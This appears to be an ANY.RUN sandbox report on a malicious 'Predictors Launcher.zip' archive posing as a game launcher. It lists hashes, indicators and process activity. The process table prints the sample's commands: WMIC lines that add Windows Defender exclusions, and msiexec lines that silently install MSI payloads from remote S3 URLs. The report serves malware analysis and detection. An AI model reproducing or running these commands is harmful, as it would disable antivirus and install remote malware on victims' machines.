analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Predictors Launcher.zip

Full analysis: https://app.any.run/tasks/95bff351-8beb-4545-b0f3-df4970292c14
Verdict: Malicious activity
Analysis date: November 30, 2020, 04:56:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

89C4A743932432DA19F4618DDE07E04A

SHA1:

4A4C1CD2BFDD709AD355CD2B337DBD0BEE4386F2

SHA256:

F56A2021AB0C2E24BC6BD384704739295A92694EA713F3057EC9D8AE9212C194

SSDEEP:

393216:qwNlj7V6fltnF8arHxgZOxqbh4V2nBMgPyXAU:l6ttnTjxgZOxW4ViNyQU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Predictor Launcher.exe (PID: 552)
      • Predictor Launcher.exe (PID: 3024)

    • Uses Microsoft Installer as loader

      • Predictor Launcher.exe (PID: 552)

    • Changes settings of System certificates

      • msiexec.exe (PID: 3004)

  • SUSPICIOUS

    • Drops a file that was compiled in debug mode

      • WinRAR.exe (PID: 2876)

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 2876)

    • Adds / modifies Windows certificates

      • msiexec.exe (PID: 3004)

    • Starts CMD.EXE for commands execution

      • Predictor Launcher.exe (PID: 552)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xpi | Mozilla Firefox browser extension (66.6)
.zip | ZIP compressed archive (33.3)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2017:02:14 07:38:11
ZipCRC: 0xdc9d6294
ZipCompressedSize: 1104
ZipUncompressedSize: 4149
ZipFileName: Predictors Launcher/AntiBusteds (1).dll
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
49
Monitored processes
10
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
drop and start drop and start start winrar.exe predictor launcher.exe no specs predictor launcher.exe wmic.exe no specs wmic.exe no specs msiexec.exe no specs msiexec.exe cmd.exe no specs msiexec.exe no specs notepad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2876"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Predictors Launcher.zip"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3024"C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\Predictor Launcher.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\Predictor Launcher.exeWinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
552"C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\Predictor Launcher.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\Predictor Launcher.exe
WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
2496"C:\Windows\System32\wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\Users\admin\AppData\LocalC:\Windows\System32\wbem\WMIC.exePredictor Launcher.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
2147749902
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3316"C:\Windows\System32\wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\Users\admin\AppData\RoamingC:\Windows\System32\wbem\WMIC.exePredictor Launcher.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
2147749902
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3692"C:\Windows\System32\msiexec.exe" /i https://sasosa.s3.amazonaws.com/EY3ZTKXKWRXB93ODV94761XD34RU0NUH.msi /qnC:\Windows\System32\msiexec.exePredictor Launcher.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3004C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3784"C:\Windows\System32\cmd.exe" taskkill / IM msiexec.exeC:\Windows\System32\cmd.exePredictor Launcher.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2008"C:\Windows\System32\msiexec.exe" /i https://plugsa.s3.eu-west-2.amazonaws.com/reza.msi /qnC:\Windows\System32\msiexec.exePredictor Launcher.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Exit code:
1618
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2052"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\Rar$DIa2876.6267\READ IMPORTANT HOW TO INSTALL.txtC:\Windows\system32\NOTEPAD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
613
Read events
569
Write events
0
Delete events
0

Modification events

No data
Executable files
8
Suspicious files
0
Text files
76
Unknown types
0

Dropped files

PID
Process
Filename
Type
2876WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\AntiBusteds (1).dlltext
MD5:113F80EE3DC312A093CE9E89F95404FE
SHA256:8D3C4839E54881B05E93887868F5ACD25E4A1B40A2C21239BB028A20D801D301
2876WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\AntiBusteds (2).dlltext
MD5:113F80EE3DC312A093CE9E89F95404FE
SHA256:8D3C4839E54881B05E93887868F5ACD25E4A1B40A2C21239BB028A20D801D301
2876WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\datetime.htext
MD5:958421EA055F38A3A54538A6C84795D5
SHA256:A80CA694DCCFE8EE65E3BBD2DFC57ADF2BE9464CA37EFE2B84471FF1FD61CDE7
2876WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\bytearrayobject.htext
MD5:0310F1528CA7A9966680F95117EA487E
SHA256:400E6E276FC3FA823F29629FECFF302BD08D1ABB896FB500C4FAA334AA3293FD
2876WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\boolobject.htext
MD5:DCC48FC557F8337D7BAA90E13D34B36A
SHA256:9483A995582F2DDAD6B47F85BB300371346CA10E846B923170D39E523815134F
2876WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\complexobject.htext
MD5:FA93753FDBEFD8869D0EFE7EBC0E52A7
SHA256:581414618CD495C42A82C3F0AB1A4E3F10A294E2FB4BB1EFCFEB44BCD0EC3A42
2876WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\Data\Ankama Helsa.dllexecutable
MD5:1F8DB83C98BC6528589B061BD7055472
SHA256:93D519B30A7D388FA983B14C94119088C3C3EA91512FE42D104E5343AA0F38E8
2876WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\ceval.htext
MD5:AC76D8E98C4419356787EF0F0A70955C
SHA256:A50DDF6E874CFD1FD226080BF31E4636A2F5FAD806A4116CBD68EDB612932515
2876WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\bytesobject.htext
MD5:EE293911E2B74B3AAF1F8599FB88FFB8
SHA256:1582D6984B4FD2ED407CBD50B3AD97B79FA95451D39333F1D6966FAC40262974
2876WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\cellobject.htext
MD5:BAA321AEBD7EF2A8D505C75B76F50BEC
SHA256:A277081668BC14F99518B3B7FBC8C8E1B98CC89BD3D1E6AB02D864ECE1209A9C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3004
msiexec.exe
52.217.96.28:443
sasosa.s3.amazonaws.com
Amazon.com, Inc.
US
shared

DNS requests

Domain
IP
Reputation
sasosa.s3.amazonaws.com
  • 52.217.96.28
shared

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Predictors Launcher.zip